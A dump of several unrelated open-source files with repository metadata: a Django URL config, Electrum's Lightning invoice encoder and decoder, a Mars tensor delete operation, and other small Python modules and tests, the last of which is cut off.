] | null | null | null | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
] | 55 | 2018-03-19T20:56:04.000Z | 2018-10-10T21:28:26.000Z | example/exampleapp/urls.py | The-Politico/politico-civic-election-night | a8aaf5be43872a7b84d2b0d7c2b6151d32d4d8b6 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('electionnight.urls')),
path('loader/', include('aploader.urls')),
]
| 24.333333 | 46 | 0.680365 |
ace941db7ca0ab1c73ca5eff9dc6705aa88a7be1 | 17,331 | py | Python | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | electrum/lnaddr.py | IHIHIKI/electrum | 5f527720cf2ae4c7aef1cfdcf4244dbceb54a5bc | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# This was forked from https://github.com/rustyrussell/lightning-payencode/tree/acc16ec13a3fa1dc16c07af6ec67c261bd8aff23
import re
import time
from hashlib import sha256
from binascii import hexlify
from decimal import Decimal
import bitstring
from .bitcoin import hash160_to_b58_address, b58_address_to_hash160
from .segwit_addr import bech32_encode, bech32_decode, CHARSET
from . import constants
from . import ecc
from .util import PR_TYPE_LN
from .bitcoin import COIN
# BOLT #11:
#
# A writer MUST encode `amount` as a positive decimal integer with no
# leading zeroes, SHOULD use the shortest representation possible.
def shorten_amount(amount):
""" Given an amount in bitcoin, shorten it
"""
# Convert to pico initially
amount = int(amount * 10**12)
units = ['p', 'n', 'u', 'm', '']
for unit in units:
if amount % 1000 == 0:
amount //= 1000
else:
break
return str(amount) + unit
def unshorten_amount(amount):
""" Given a shortened amount, convert it into a decimal
"""
# BOLT #11:
# The following `multiplier` letters are defined:
#
#* `m` (milli): multiply by 0.001
#* `u` (micro): multiply by 0.000001
#* `n` (nano): multiply by 0.000000001
#* `p` (pico): multiply by 0.000000000001
units = {
'p': 10**12,
'n': 10**9,
'u': 10**6,
'm': 10**3,
}
unit = str(amount)[-1]
# BOLT #11:
# A reader SHOULD fail if `amount` contains a non-digit, or is followed by
# anything except a `multiplier` in the table above.
if not re.fullmatch("\\d+[pnum]?", str(amount)):
raise ValueError("Invalid amount '{}'".format(amount))
if unit in units.keys():
return Decimal(amount[:-1]) / units[unit]
else:
return Decimal(amount)
# Bech32 spits out array of 5-bit values. Shim here.
def u5_to_bitarray(arr):
ret = bitstring.BitArray()
for a in arr:
ret += bitstring.pack("uint:5", a)
return ret
def bitarray_to_u5(barr):
assert barr.len % 5 == 0
ret = []
s = bitstring.ConstBitStream(barr)
while s.pos != s.len:
ret.append(s.read(5).uint)
return ret
def encode_fallback(fallback, currency):
""" Encode all supported fallback addresses.
"""
if currency in [constants.BitcoinMainnet.SEGWIT_HRP, constants.BitcoinTestnet.SEGWIT_HRP]:
fbhrp, witness = bech32_decode(fallback, ignore_long_length=True)
if fbhrp:
if fbhrp != currency:
raise ValueError("Not a bech32 address for this currency")
wver = witness[0]
if wver > 16:
raise ValueError("Invalid witness version {}".format(witness[0]))
wprog = u5_to_bitarray(witness[1:])
else:
addrtype, addr = b58_address_to_hash160(fallback)
if is_p2pkh(currency, addrtype):
wver = 17
elif is_p2sh(currency, addrtype):
wver = 18
else:
raise ValueError("Unknown address type for {}".format(currency))
wprog = addr
return tagged('f', bitstring.pack("uint:5", wver) + wprog)
else:
raise NotImplementedError("Support for currency {} not implemented".format(currency))
def parse_fallback(fallback, currency):
if currency in [constants.BitcoinMainnet.SEGWIT_HRP, constants.BitcoinTestnet.SEGWIT_HRP]:
wver = fallback[0:5].uint
if wver == 17:
addr=hash160_to_b58_address(fallback[5:].tobytes(), base58_prefix_map[currency][0])
elif wver == 18:
addr=hash160_to_b58_address(fallback[5:].tobytes(), base58_prefix_map[currency][1])
elif wver <= 16:
addr=bech32_encode(currency, bitarray_to_u5(fallback))
else:
return None
else:
addr=fallback.tobytes()
return addr
# Map of classical and witness address prefixes
base58_prefix_map = {
constants.BitcoinMainnet.SEGWIT_HRP : (constants.BitcoinMainnet.ADDRTYPE_P2PKH, constants.BitcoinMainnet.ADDRTYPE_P2SH),
constants.BitcoinTestnet.SEGWIT_HRP : (constants.BitcoinTestnet.ADDRTYPE_P2PKH, constants.BitcoinTestnet.ADDRTYPE_P2SH)
}
def is_p2pkh(currency, prefix):
return prefix == base58_prefix_map[currency][0]
def is_p2sh(currency, prefix):
return prefix == base58_prefix_map[currency][1]
# Tagged field containing BitArray
def tagged(char, l):
# Tagged fields need to be zero-padded to 5 bits.
while l.len % 5 != 0:
l.append('0b0')
return bitstring.pack("uint:5, uint:5, uint:5",
CHARSET.find(char),
(l.len / 5) / 32, (l.len / 5) % 32) + l
# Tagged field containing bytes
def tagged_bytes(char, l):
return tagged(char, bitstring.BitArray(l))
def trim_to_min_length(bits):
"""Ensures 'bits' have min number of leading zeroes.
Assumes 'bits' is big-endian, and that it needs to be encoded in 5 bit blocks.
"""
bits = bits[:] # copy
# make sure we can be split into 5 bit blocks
while bits.len % 5 != 0:
bits.prepend('0b0')
# Get minimal length by trimming leading 5 bits at a time.
while bits.startswith('0b00000'):
if len(bits) == 5:
break # v == 0
bits = bits[5:]
return bits
# Discard trailing bits, convert to bytes.
def trim_to_bytes(barr):
# Adds a byte if necessary.
b = barr.tobytes()
if barr.len % 8 != 0:
return b[:-1]
return b
# Try to pull out tagged data: returns tag, tagged data and remainder.
def pull_tagged(stream):
tag = stream.read(5).uint
length = stream.read(5).uint * 32 + stream.read(5).uint
return (CHARSET[tag], stream.read(length * 5), stream)
def lnencode(addr: 'LnAddr', privkey) -> str:
if addr.amount:
amount = Decimal(str(addr.amount))
# We can only send down to millisatoshi.
if amount * 10**12 % 10:
raise ValueError("Cannot encode {}: too many decimal places".format(
addr.amount))
amount = addr.currency + shorten_amount(amount)
else:
amount = addr.currency if addr.currency else ''
hrp = 'ln' + amount
# Start with the timestamp
data = bitstring.pack('uint:35', addr.date)
tags_set = set()
# Payment hash
data += tagged_bytes('p', addr.paymenthash)
tags_set.add('p')
if addr.payment_secret is not None:
data += tagged_bytes('s', addr.payment_secret)
tags_set.add('s')
for k, v in addr.tags:
# BOLT #11:
#
# A writer MUST NOT include more than one `d`, `h`, `n` or `x` fields,
if k in ('d', 'h', 'n', 'x', 'p', 's'):
if k in tags_set:
raise ValueError("Duplicate '{}' tag".format(k))
if k == 'r':
route = bitstring.BitArray()
for step in v:
pubkey, channel, feebase, feerate, cltv = step
route.append(bitstring.BitArray(pubkey) + bitstring.BitArray(channel) + bitstring.pack('intbe:32', feebase) + bitstring.pack('intbe:32', feerate) + bitstring.pack('intbe:16', cltv))
data += tagged('r', route)
elif k == 'f':
data += encode_fallback(v, addr.currency)
elif k == 'd':
data += tagged_bytes('d', v.encode())
elif k == 'x':
expirybits = bitstring.pack('intbe:64', v)
expirybits = trim_to_min_length(expirybits)
data += tagged('x', expirybits)
elif k == 'h':
data += tagged_bytes('h', sha256(v.encode('utf-8')).digest())
elif k == 'n':
data += tagged_bytes('n', v)
elif k == 'c':
finalcltvbits = bitstring.pack('intbe:64', v)
finalcltvbits = trim_to_min_length(finalcltvbits)
data += tagged('c', finalcltvbits)
elif k == '9':
if v == 0:
continue
feature_bits = bitstring.BitArray(uint=v, length=v.bit_length())
feature_bits = trim_to_min_length(feature_bits)
data += tagged('9', feature_bits)
else:
# FIXME: Support unknown tags?
raise ValueError("Unknown tag {}".format(k))
tags_set.add(k)
# BOLT #11:
#
# A writer MUST include either a `d` or `h` field, and MUST NOT include
# both.
if 'd' in tags_set and 'h' in tags_set:
raise ValueError("Cannot include both 'd' and 'h'")
if not 'd' in tags_set and not 'h' in tags_set:
raise ValueError("Must include either 'd' or 'h'")
# We actually sign the hrp, then data (padded to 8 bits with zeroes).
msg = hrp.encode("ascii") + data.tobytes()
privkey = ecc.ECPrivkey(privkey)
sig = privkey.sign_message(msg, is_compressed=False, algo=lambda x:sha256(x).digest())
recovery_flag = bytes([sig[0] - 27])
sig = bytes(sig[1:]) + recovery_flag
data += sig
return bech32_encode(hrp, bitarray_to_u5(data))
class LnAddr(object):
def __init__(self, *, paymenthash: bytes = None, amount=None, currency=None, tags=None, date=None,
payment_secret: bytes = None):
self.date = int(time.time()) if not date else int(date)
self.tags = [] if not tags else tags
self.unknown_tags = []
self.paymenthash = paymenthash
self.payment_secret = payment_secret
self.signature = None
self.pubkey = None
self.currency = constants.net.SEGWIT_HRP if currency is None else currency
self.amount = amount # in bitcoins
self._min_final_cltv_expiry = 9
def __str__(self):
return "LnAddr[{}, amount={}{} tags=[{}]]".format(
hexlify(self.pubkey.serialize()).decode('utf-8') if self.pubkey else None,
self.amount, self.currency,
", ".join([k + '=' + str(v) for k, v in self.tags])
)
def get_min_final_cltv_expiry(self) -> int:
return self._min_final_cltv_expiry
def get_tag(self, tag):
for k, v in self.tags:
if k == tag:
return v
return None
def get_description(self) -> str:
return self.get_tag('d') or ''
def get_expiry(self) -> int:
exp = self.get_tag('x')
if exp is None:
exp = 3600
return int(exp)
def is_expired(self) -> bool:
now = time.time()
# BOLT-11 does not specify what expiration of '0' means.
# we treat it as 0 seconds here (instead of never)
return now > self.get_expiry() + self.date
class LnDecodeException(Exception): pass
class SerializableKey:
def __init__(self, pubkey):
self.pubkey = pubkey
def serialize(self):
return self.pubkey.get_public_key_bytes(True)
def lndecode(invoice: str, *, verbose=False, expected_hrp=None) -> LnAddr:
if expected_hrp is None:
expected_hrp = constants.net.SEGWIT_HRP
hrp, data = bech32_decode(invoice, ignore_long_length=True)
if not hrp:
raise ValueError("Bad bech32 checksum")
# BOLT #11:
#
# A reader MUST fail if it does not understand the `prefix`.
if not hrp.startswith('ln'):
raise ValueError("Does not start with ln")
if not hrp[2:].startswith(expected_hrp):
raise ValueError("Wrong Lightning invoice HRP " + hrp[2:] + ", should be " + expected_hrp)
data = u5_to_bitarray(data)
# Final signature 65 bytes, split it off.
if len(data) < 65*8:
raise ValueError("Too short to contain signature")
sigdecoded = data[-65*8:].tobytes()
data = bitstring.ConstBitStream(data[:-65*8])
addr = LnAddr()
addr.pubkey = None
m = re.search("[^\\d]+", hrp[2:])
if m:
addr.currency = m.group(0)
amountstr = hrp[2+m.end():]
# BOLT #11:
#
# A reader SHOULD indicate if amount is unspecified, otherwise it MUST
# multiply `amount` by the `multiplier` value (if any) to derive the
# amount required for payment.
if amountstr != '':
addr.amount = unshorten_amount(amountstr)
addr.date = data.read(35).uint
while data.pos != data.len:
tag, tagdata, data = pull_tagged(data)
# BOLT #11:
#
# A reader MUST skip over unknown fields, an `f` field with unknown
# `version`, or a `p`, `h`, or `n` field which does not have
# `data_length` 52, 52, or 53 respectively.
data_length = len(tagdata) / 5
if tag == 'r':
# BOLT #11:
#
# * `r` (3): `data_length` variable. One or more entries
# containing extra routing information for a private route;
# there may be more than one `r` field, too.
# * `pubkey` (264 bits)
# * `short_channel_id` (64 bits)
# * `feebase` (32 bits, big-endian)
# * `feerate` (32 bits, big-endian)
# * `cltv_expiry_delta` (16 bits, big-endian)
route=[]
s = bitstring.ConstBitStream(tagdata)
while s.pos + 264 + 64 + 32 + 32 + 16 < s.len:
route.append((s.read(264).tobytes(),
s.read(64).tobytes(),
s.read(32).intbe,
s.read(32).intbe,
s.read(16).intbe))
addr.tags.append(('r',route))
elif tag == 'f':
fallback = parse_fallback(tagdata, addr.currency)
if fallback:
addr.tags.append(('f', fallback))
else:
# Incorrect version.
addr.unknown_tags.append((tag, tagdata))
continue
elif tag == 'd':
addr.tags.append(('d', trim_to_bytes(tagdata).decode('utf-8')))
elif tag == 'h':
if data_length != 52:
addr.unknown_tags.append((tag, tagdata))
continue
addr.tags.append(('h', trim_to_bytes(tagdata)))
elif tag == 'x':
addr.tags.append(('x', tagdata.uint))
elif tag == 'p':
if data_length != 52:
addr.unknown_tags.append((tag, tagdata))
continue
addr.paymenthash = trim_to_bytes(tagdata)
elif tag == 's':
if data_length != 52:
addr.unknown_tags.append((tag, tagdata))
continue
addr.payment_secret = trim_to_bytes(tagdata)
elif tag == 'n':
if data_length != 53:
addr.unknown_tags.append((tag, tagdata))
continue
pubkeybytes = trim_to_bytes(tagdata)
addr.pubkey = pubkeybytes
elif tag == 'c':
addr._min_final_cltv_expiry = tagdata.int
elif tag == '9':
features = tagdata.uint
addr.tags.append(('9', features))
from .lnutil import validate_features
validate_features(features)
else:
addr.unknown_tags.append((tag, tagdata))
if verbose:
print('hex of signature data (32 byte r, 32 byte s): {}'
.format(hexlify(sigdecoded[0:64])))
print('recovery flag: {}'.format(sigdecoded[64]))
print('hex of data for signing: {}'
.format(hexlify(hrp.encode("ascii") + data.tobytes())))
print('SHA256 of above: {}'.format(sha256(hrp.encode("ascii") + data.tobytes()).hexdigest()))
# BOLT #11:
#
# A reader MUST check that the `signature` is valid (see the `n` tagged
# field specified below).
addr.signature = sigdecoded[:65]
hrp_hash = sha256(hrp.encode("ascii") + data.tobytes()).digest()
if addr.pubkey: # Specified by `n`
# BOLT #11:
#
# A reader MUST use the `n` field to validate the signature instead of
# performing signature recovery if a valid `n` field is provided.
ecc.ECPubkey(addr.pubkey).verify_message_hash(sigdecoded[:64], hrp_hash)
pubkey_copy = addr.pubkey
class WrappedBytesKey:
serialize = lambda: pubkey_copy
addr.pubkey = WrappedBytesKey
else: # Recover pubkey from signature.
addr.pubkey = SerializableKey(ecc.ECPubkey.from_sig_string(sigdecoded[:64], sigdecoded[64], hrp_hash))
return addr
def parse_lightning_invoice(invoice):
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
amount = int(lnaddr.amount * COIN) if lnaddr.amount else None
return {
'type': PR_TYPE_LN,
'invoice': invoice,
'amount': amount,
'message': lnaddr.get_description(),
'time': lnaddr.date,
'exp': lnaddr.get_expiry(),
'pubkey': lnaddr.pubkey.serialize().hex(),
'rhash': lnaddr.paymenthash.hex(),
}
if __name__ == '__main__':
# run using
# python3 -m electrum.lnaddr <invoice> <expected hrp>
# python3 -m electrum.lnaddr lntb1n1pdlcakepp5e7rn0knl0gm46qqp9eqdsza2c942d8pjqnwa5903n39zu28sgk3sdq423jhxapqv3hkuct5d9hkucqp2rzjqwyx8nu2hygyvgc02cwdtvuxe0lcxz06qt3lpsldzcdr46my5epmj9vk9sqqqlcqqqqqqqlgqqqqqqgqjqdhnmkgahfaynuhe9md8k49xhxuatnv6jckfmsjq8maxta2l0trh5sdrqlyjlwutdnpd5gwmdnyytsl9q0dj6g08jacvthtpeg383k0sq542rz2 tb1n
import sys
print(lndecode(sys.argv[1], expected_hrp=sys.argv[2]))
| 35.154158 | 330 | 0.596503 |
ace94261e2a1b4e6e62742616d4442c32a14b85e | 8,530 | py | Python | mars/tensor/base/delete.py | haijohn/mars | 672b3a33a70565f01b1a3f508908445491d85acf | [
"Apache-2.0"
] | 1 | 2021-06-10T02:43:01.000Z | 2021-06-10T02:43:01.000Z | mars/tensor/base/delete.py | JeffroMF/mars | 2805241ac55b50c4f6319baa41113fbf8c723832 | [
"Apache-2.0"
] | null | null | null | mars/tensor/base/delete.py | JeffroMF/mars | 2805241ac55b50c4f6319baa41113fbf8c723832 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import defaultdict
import numpy as np
from ... import opcodes as OperandDef
from ...core import ENTITY_TYPE, recursive_tile
from ...serialization.serializables import Int32Field, Int64Field, AnyField, KeyField
from ...utils import has_unknown_shape
from ..datasource import tensor as astensor
from ..operands import TensorHasInput, TensorOperandMixin
from ..utils import filter_inputs, validate_axis, slice_split, calc_object_length
class TensorDelete(TensorHasInput, TensorOperandMixin):
_op_type_ = OperandDef.DELETE
_index_obj = AnyField('index_obj')
_axis = Int32Field('axis')
_input = KeyField('input')
# for chunk
_offset_on_axis = Int64Field('offset_on_axis')
def __init__(self, index_obj=None, axis=None, offset_on_axis=None, **kw):
super().__init__(_index_obj=index_obj, _axis=axis,
_offset_on_axis=offset_on_axis, **kw)
@property
def index_obj(self):
return self._index_obj
@property
def axis(self):
return self._axis
@property
def offset_on_axis(self):
return self._offset_on_axis
def _set_inputs(self, inputs):
super()._set_inputs(inputs)
if len(self._inputs) > 1:
self._index_obj = self._inputs[1]
@classmethod
def tile(cls, op: 'TensorDelete'):
inp = op.input
index_obj = op.index_obj
axis = op.axis
if axis is None:
inp = yield from recursive_tile(inp.flatten())
axis = 0
if has_unknown_shape(inp):
yield
if isinstance(index_obj, int):
index_obj = [index_obj]
if isinstance(index_obj, ENTITY_TYPE):
index_obj = yield from recursive_tile(
index_obj.rechunk(index_obj.shape))
offsets = np.cumsum([0] + list(inp.nsplits[axis]))
out_chunks = []
for c in inp.chunks:
chunk_op = op.copy().reset_key()
chunk_op._index_obj = index_obj.chunks[0]
chunk_op._offset_on_axis = int(offsets[c.index[axis]])
shape = tuple(np.nan if j == axis else s
for j, s in enumerate(c.shape))
out_chunks.append(chunk_op.new_chunk([c, index_obj.chunks[0]],
shape=shape,
index=c.index))
nsplits_on_axis = (np.nan,) * len(inp.nsplits[axis])
else:
nsplits_on_axis = [None for _ in inp.nsplits[axis]]
out_chunks = []
# index_obj is list, tuple, slice or array like
if isinstance(index_obj, slice):
slc_splits = slice_split(index_obj, inp.nsplits[axis])
for c in inp.chunks:
if c.index[axis] in slc_splits:
chunk_op = op.copy().reset_key()
chunk_slc = slc_splits[c.index[axis]]
shape = tuple(s - calc_object_length(chunk_slc, s) if j == axis else s
for j, s in enumerate(c.shape))
chunk_op._index_obj = chunk_slc
out_chunks.append(
chunk_op.new_chunk([c], shape=shape, index=c.index))
nsplits_on_axis[c.index[axis]] = shape[axis]
else:
out_chunks.append(c)
nsplits_on_axis[c.index[axis]] = c.shape[axis]
else:
index_obj = np.array(index_obj)
cum_splits = np.cumsum([0] + list(inp.nsplits[axis]))
chunk_indexes = defaultdict(list)
for int_idx in index_obj:
in_idx = cum_splits.searchsorted(int_idx, side='right') - 1
chunk_indexes[in_idx].append(int_idx - cum_splits[in_idx])
for c in inp.chunks:
idx_on_axis = c.index[axis]
if idx_on_axis in chunk_indexes:
chunk_op = op.copy().reset_key()
chunk_op._index_obj = chunk_indexes[idx_on_axis]
shape = tuple(s - len(chunk_indexes[idx_on_axis])
if j == axis else s for j, s in enumerate(c.shape))
out_chunks.append(
chunk_op.new_chunk([c], shape=shape, index=c.index))
nsplits_on_axis[c.index[axis]] = shape[axis]
else:
out_chunks.append(c)
nsplits_on_axis[c.index[axis]] = c.shape[axis]
nsplits = tuple(s if i != axis else tuple(nsplits_on_axis)
for i, s in enumerate(inp.nsplits))
out = op.outputs[0]
new_op = op.copy()
return new_op.new_tensors(op.inputs, shape=out.shape, order=out.order,
chunks=out_chunks, nsplits=nsplits)
@classmethod
def execute(cls, ctx, op):
inp = ctx[op.input.key]
index_obj = ctx[op.index_obj.key] if hasattr(op.index_obj, 'key') else op.index_obj
if op.offset_on_axis is None:
ctx[op.outputs[0].key] = np.delete(inp, index_obj, axis=op.axis)
else:
index_obj = np.array(index_obj)
part_index = [idx - op.offset_on_axis for idx in index_obj if (
(idx >= op.offset_on_axis) and idx < (op.offset_on_axis + inp.shape[op.axis or 0]))]
ctx[op.outputs[0].key] = np.delete(
inp, part_index, axis=op.axis)
def __call__(self, arr, obj, shape):
return self.new_tensor(filter_inputs([arr, obj]),
shape=shape, order=arr.order)
def delete(arr, obj, axis=None):
"""
Return a new array with sub-arrays along an axis deleted. For a one
dimensional array, this returns those entries not returned by
`arr[obj]`.
Parameters
----------
arr : array_like
Input array.
obj : slice, int or array of ints
Indicate indices of sub-arrays to remove along the specified axis.
axis : int, optional
The axis along which to delete the subarray defined by `obj`.
If `axis` is None, `obj` is applied to the flattened array.
Returns
-------
out : mars.tensor
A copy of `arr` with the elements specified by `obj` removed. Note
that `delete` does not occur in-place. If `axis` is None, `out` is
a flattened array.
Examples
--------
>>> import mars.tensor as mt
>>> arr = mt.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
>>> arr.execute()
array([[ 1, 2, 3, 4],
[ 5, 6, 7, 8],
[ 9, 10, 11, 12]])
>>> mt.delete(arr, 1, 0).execute()
array([[ 1, 2, 3, 4],
[ 9, 10, 11, 12]])
>>> mt.delete(arr, np.s_[::2], 1).execute()
array([[ 2, 4],
[ 6, 8],
[10, 12]])
>>> mt.delete(arr, [1,3,5], None).execute()
array([ 1, 3, 5, 7, 8, 9, 10, 11, 12])
"""
arr = astensor(arr)
arr = astensor(arr)
if getattr(obj, 'ndim', 0) > 1: # pragma: no cover
raise ValueError('index array argument obj to insert must be '
'one dimensional or scalar')
if axis is None:
# if axis is None, array will be flatten
arr_size = arr.size
idx_length = calc_object_length(obj, size=arr_size)
shape = (arr_size - idx_length,)
else:
validate_axis(arr.ndim, axis)
idx_length = calc_object_length(obj, size=arr.shape[axis])
shape = tuple(s - idx_length if i == axis else s
for i, s in enumerate(arr.shape))
op = TensorDelete(index_obj=obj, axis=axis, dtype=arr.dtype)
return op(arr, obj, shape)
| 39.308756 | 104 | 0.563892 |
ace943756f81fc21b5fdcbc1917e45f1a47b616b | 2,404 | py | Python | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
] | null | null | null | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
] | null | null | null | core/segments/base.py | molejar/imxmi | 1d59af80d3c5605b8b5c4d5734c05dfd9b75854d | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2017-2019 Martin Olejar
#
# SPDX-License-Identifier: BSD-3-Clause
# The BSD-3-Clause license for this file can be found in the LICENSE file included with this distribution
# or at https://spdx.org/licenses/BSD-3-Clause.html#licenseText
import os
from voluptuous import Schema, ALLOW_EXTRA
def get_full_path(root, *path_list):
"""
:param root:
:param path:
:return:
"""
ret_path = []
for path in path_list:
file_path = ""
for abs_path in [path, os.path.join(root, path)]:
abs_path = os.path.normpath(abs_path)
if os.path.exists(abs_path):
file_path = abs_path
break
if not file_path:
raise Exception("Path: \"%s\" doesnt exist" % path)
ret_path.append(file_path)
return ret_path
def get_data_segment(db, name):
""" Get data segments by it's name
:param db:
:param name: The name of data segments
:return: return object
"""
assert isinstance(db, list), ""
assert isinstance(name, str), ""
for item in db:
if item.full_name == name.upper():
return item
raise Exception("{} doesn't exist !".format(name))
class DatSegBase(object):
""" Data segments base class """
MARK = 'base'
SCHEMA = {}
@property
def loaded(self):
return False if self.smx_data is None else True
@property
def full_name(self):
return '{}.{}'.format(self.name, self.MARK)
def __init__(self, name, smx_data=None):
""" Init BaseItem
:param name: Data segments name
:return Data segments object
"""
assert isinstance(name, str)
self.name = name
self.data = None
self.smx_data = None
if smx_data is not None:
self.init(smx_data)
def __str__(self):
""" String representation """
return self.info()
def __ne__(self, node):
""" Check data segments inequality """
return not self.__eq__(node)
def init(self, smx_data):
""" Initialize IMX segments
:param smx_data: ...
"""
assert isinstance(smx_data, dict)
s = Schema(self.SCHEMA, extra=ALLOW_EXTRA)
self.smx_data = s(smx_data)
def info(self):
return self.full_name
def load(self, db, root_path):
raise NotImplementedError()
| 24.783505 | 105 | 0.596922 |
ace9437ae9e2ea4e7792377ddd3ef15500482077 | 931 | py | Python | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | generate_matrix.py | xinming365/LeetCode | e56097a60ddd1b5ddba7f15a726661c2aa6633e7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2022/1/22 11:28 上午
# @Author : xinming
# @File : generate_matrix.py
from typing import List
class Solution:
def generateMatrix(self, n: int) -> List[List[int]]:
l, r, t, b=0, n-1, 0, n-1
mat = [[0 for _ in range(n)] for _ in range(n)]
size=n*n
nums = 1
while nums <= size:
for i in range(l, r+1):
mat[t][i]=nums
nums+=1
t+=1
for i in range(t, b+1):
mat[i][r]=nums
nums+=1
r-=1
for i in range(r, l-1, -1):
mat[b][i]=nums
nums+=1
b-=1
for i in range(b, t-1, -1):
mat[i][l]=nums
nums+=1
l+=1
return mat
if __name__=='__main__':
s =3
out = Solution().generateMatrix(s)
print(out)
| 23.871795 | 56 | 0.421053 |
ace944bc95e0335be4160941f4a1d8bf81ff8c1e | 163 | py | Python | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 42 | 2020-05-03T15:10:30.000Z | 2022-03-24T17:10:24.000Z | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 2 | 2021-04-18T15:18:57.000Z | 2022-03-18T09:09:01.000Z | geostream/producer/tests/conftest.py | yoophi/geo-stream-kafka | 77fac42350616bf3e882fb783cb44c3627556422 | [
"MIT"
] | 15 | 2020-03-11T02:46:30.000Z | 2022-03-12T10:27:56.000Z | import pytest
from app.main import app
from starlette.testclient import TestClient
@pytest.fixture
def test_app():
client = TestClient(app)
yield client
| 16.3 | 43 | 0.766871 |
ace944e79b5c4585b4961171976ad301f8b70865 | 2,174 | py | Python | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | lightning_transformers/task/nlp/summarization/model.py | maksym-taranukhin/lightning-transformers | aa7202657973b5b65c3c36eb745621043859ebc4 | [
"Apache-2.0"
] | null | null | null | # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from lightning_transformers.core.nlp.seq2seq import Seq2SeqTransformer
from lightning_transformers.task.nlp.summarization.config import SummarizationConfig
from lightning_transformers.task.nlp.summarization.metric import RougeMetric
class SummarizationTransformer(Seq2SeqTransformer):
"""
Defines ``LightningModule`` for the Summarization Task.
Args:
*args: :class:`lightning_transformers.core.nlp.seq2seq.Seq2SeqTransformer` arguments.
downstream_model_type: Downstream HuggingFace AutoModel to load.
(default ``transformers.AutoModelForSeq2SeqLM``)
**kwargs: :class:`lightning_transformers.core.nlp.seq2seq.Seq2SeqTransformer` arguments.
"""
def __init__(
self,
*args,
downstream_model_type: str = 'transformers.AutoModelForSeq2SeqLM',
cfg: SummarizationConfig = SummarizationConfig(),
**kwargs
) -> None:
super().__init__(downstream_model_type, *args, cfg=cfg, **kwargs)
self.rouge = None
def compute_generate_metrics(self, batch, prefix):
tgt_lns = self.tokenize_labels(batch["labels"])
pred_lns = self.generate(batch["input_ids"], batch["attention_mask"])
result = self.rouge(pred_lns, tgt_lns)
self.log_dict(result, on_step=False, on_epoch=True)
def configure_metrics(self, stage: str):
self.rouge = RougeMetric(
rouge_newline_sep=self.cfg.rouge_newline_sep,
use_stemmer=self.cfg.use_stemmer,
)
@property
def hf_pipeline_task(self) -> str:
return "summarization"
| 39.527273 | 96 | 0.720331 |
ace945416a337c67f7cca2fb03f3536909822106 | 3,287 | py | Python | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | null | null | null | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | 1 | 2021-06-01T01:43:52.000Z | 2021-06-01T01:43:52.000Z | test/calibration/experiments/test_ramsey_xy.py | coruscating/qiskit-experiments | dac1febf13be870d3bac16af22aa341a088e0766 | [
"Apache-2.0"
] | 2 | 2021-05-17T10:13:20.000Z | 2021-06-01T01:34:34.000Z | # This code is part of Qiskit.
#
# (C) Copyright IBM 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test Ramsey XY experiments."""
from qiskit.test import QiskitTestCase
from qiskit.test.mock import FakeArmonk
from qiskit_experiments.calibration_management.backend_calibrations import BackendCalibrations
from qiskit_experiments.calibration_management.basis_gate_library import FixedFrequencyTransmon
from qiskit_experiments.library import RamseyXY, FrequencyCal
from qiskit_experiments.test.mock_iq_backend import MockRamseyXY
